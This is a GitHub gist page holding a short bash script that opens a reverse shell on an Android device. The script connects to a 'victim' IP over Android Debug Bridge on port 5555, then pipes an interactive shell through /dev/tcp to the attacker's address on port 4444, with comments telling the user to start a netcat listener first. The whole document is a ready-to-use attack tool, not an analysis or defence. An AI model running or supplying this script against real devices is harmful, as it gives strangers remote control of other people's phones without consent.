Skip to content

Instantly share code, notes, and snippets.

@seccybpre
Created March 30, 2021 08:09
Show Gist options
  • Save seccybpre/6bdd1bc9874f32203bc82d55ec7dfcc4 to your computer and use it in GitHub Desktop.
Save seccybpre/6bdd1bc9874f32203bc82d55ec7dfcc4 to your computer and use it in GitHub Desktop.
[Android shell] #android
#!/bin/bash
# Simple reverse shell on android using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# ./android-shell.sh victimip yourip
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment